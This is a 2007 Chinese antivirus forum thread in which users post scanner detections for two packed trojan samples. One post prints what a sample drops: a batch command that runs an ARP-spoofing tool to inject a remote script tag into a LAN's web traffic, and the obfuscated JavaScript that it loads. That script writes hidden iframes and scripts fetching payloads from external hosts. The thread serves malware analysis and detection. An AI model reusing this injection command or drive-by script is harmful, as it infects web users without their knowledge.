这两个病毒穿上了超级马甲，大家看看

显示全部楼层 · 发表于 2007-6-25 02:13:00

好厉害的马甲，不知道大家的杀软能不能搞定

我的麦咖啡和drweb扫不出来。昨天装软件的时候把咖啡规则关掉，忘记打开了。

然后今天启动电脑，就发现这两只虫虫了

显示全部楼层 · 发表于 2007-6-25 02:15:47

Starting the file scan:

Begin scan in 'C:\Documents and Settings\wang\My Documents\virus.rar'
C:\Documents and Settings\wang\My Documents\virus.rar
  [0] Archive type: RAR
  --> svchost2.exe
   [DETECTION] Is the Trojan horse TR/Crypt.XPACK.Gen
   [WARNING] The file was ignored!

显示全部楼层 · 发表于 2007-6-25 02:16:58

A listing of files alongside their results can be found below:

File ID  Filename  Size (Byte) Result
201480  1.exe  147.12 KB  MALWARE

Please find a detailed report concerning each individual sample below:

Filename Result
1.exe  MALWARE

The file '1.exe' has been determined to be 'MALWARE'. Our analysts named the threat DR/Optix.B.5. The term "DR/" denotes a program that is able to place a virus or a malware discretely on a system.Detection is added to our virus definition file (VDF) starting with version 6.38.01.214.

--------------------------------------------------------------------------------
Please note that you will receive an email which will contain the results shown above. In case the final outcome of the analysis is not yet finished for all files the notification will be sent once ready.

显示全部楼层 · 发表于 2007-6-25 02:16:59

显示全部楼层 · 发表于 2007-6-25 02:48:51

病毒: Win32:PePatch-CD [Trj]
檔案: virus[1].rar
目錄: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\YEAJUU4N
處理序: GreenBrowser.exe

显示全部楼层 · 发表于 2007-6-25 03:25:41

detected: Trojan program Backdoor.Win32.Hupigon.rc URL: http://bbs.kafan.cn/attachment.p ... //PE_Patch//VPacker

显示全部楼层 · 发表于 2007-6-25 03:49:32

扫描开始时间: 2007-6-25 3:55:46
扫描日志
NOD32 版本 2349 (20070623) NT
命令行: F:\virus\virus3.rar

日期: 2007年6月25日时间: 03:55:48
反 Rookits 技术已启用。
已扫描磁盘、文件夹和文件: F:\virus\virus3.rar
F:\virus\virus3.rar ?RAR ?svchost2.exe<病毒 - Win32/Banito 木马变种>
已扫描文件数量: 2
已发现病毒数量: 1
完成时间: 03:55:49 总共扫描时间: 1 秒 (00:00:01)

显示全部楼层 · 发表于 2007-6-25 05:28:22

斧头干掉

显示全部楼层 · 发表于 2007-6-25 06:04:06

Virus: Backdoor.Win32.Hupigon.rc

Virus found while downloading Web content.

Address: bbs.kafan.cn

显示全部楼层 · 发表于 2007-6-25 07:12:58

1.exe运行后：

作者也不搞个破解的，跳出来这个

但是temp里多了个bat

@shift 1
@c:\windows\config\winpcap.exe
@c:\windows\config\smss.exe -idx 0 -ip 222.77.182.2-222.77.182.253 -port 80 -insert "<script src=http://sb.25u.com/dir/index_pic/1.js></script>" -spoofmode 2 -Interval 1

复制代码

arp

js内容，加密了：

function Get(){
var $qL1 = new window["\x44\x61\x74\x65"]()
$qL1["\x73\x65\x74\x54\x69\x6d\x65"]($qL1["\x67\x65\x74\x54\x69\x6d\x65"]() + 24*60*60*1000)
var vuICgd2 = new window["\x53\x74\x72\x69\x6e\x67"](window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"])
var JHasS3 = "\x43\x6f\x6f\x6b\x69\x65\x31\x3d"
var wUhao4 = vuICgd2["\x69\x6e\x64\x65\x78\x4f\x66"](JHasS3)
if (wUhao4 != -1){
} else
{ window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"] = "\x43\x6f\x6f\x6b\x69\x65\x31\x3d\x50\x4f\x50\x57\x49\x4e\x31\x3b\x65\x78\x70\x69\x72\x65\x73\x3d"+ $qL1["\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67"]()
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x48\x54\x4d\x4c\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x42\x4f\x44\x59 \x73\x74\x79\x6c\x65\x3d\'\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\x68\x74\x74\x70\x3a\/\/\x31\x2e\x35\x32\x30\x73\x62\x2e\x63\x6e\/\x61\x64\x2e\x6a\x70\x67\x29\'\x3e\x3c\/\x42\x4f\x44\x59\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\/\x48\x54\x4d\x4c\x3e ");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x73\x72\x63\x3d"\x68\x74\x74\x70\x3a\/\/\x73\x62\x2e\x32\x35\x75\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x30\x36\x31\x34\x2e\x6a\x73"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x73\x62\x2e\x32\x35\x75\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x6d\x6d\x2e\x68\x74\x6d\x6c \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x73\x62\x2e\x32\x35\x75\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");
}
}Get();

复制代码

[ 本帖最后由 allenhippo 于 2007-6-25 07:32 编辑 ]

[病毒样本] 这两个病毒穿上了超级马甲，大家看看

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源